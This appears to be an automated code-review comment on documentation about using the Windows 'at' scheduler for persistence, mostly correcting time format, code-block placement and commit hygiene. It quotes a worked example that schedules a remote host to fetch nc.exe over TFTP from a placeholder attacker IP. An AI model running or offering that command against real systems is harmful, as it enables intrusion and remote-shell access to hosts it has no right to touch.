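Review bot: the scheduler template gives the time as `12:00 pm` (with a space) and the worked example as `12:00pm`, and `at` expects hours:minutes in 24-hour notation; use `12:00` in both so the command parses and the two lines agree. The worked example `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe` should sit in a code block like the template rather than inline prose, and the page should say that an `at` job runs under the SYSTEM account, since that is the reason this is a persistence technique. The commit message "Adding more content." does not say what was added; name the section. The file still ends without a newline.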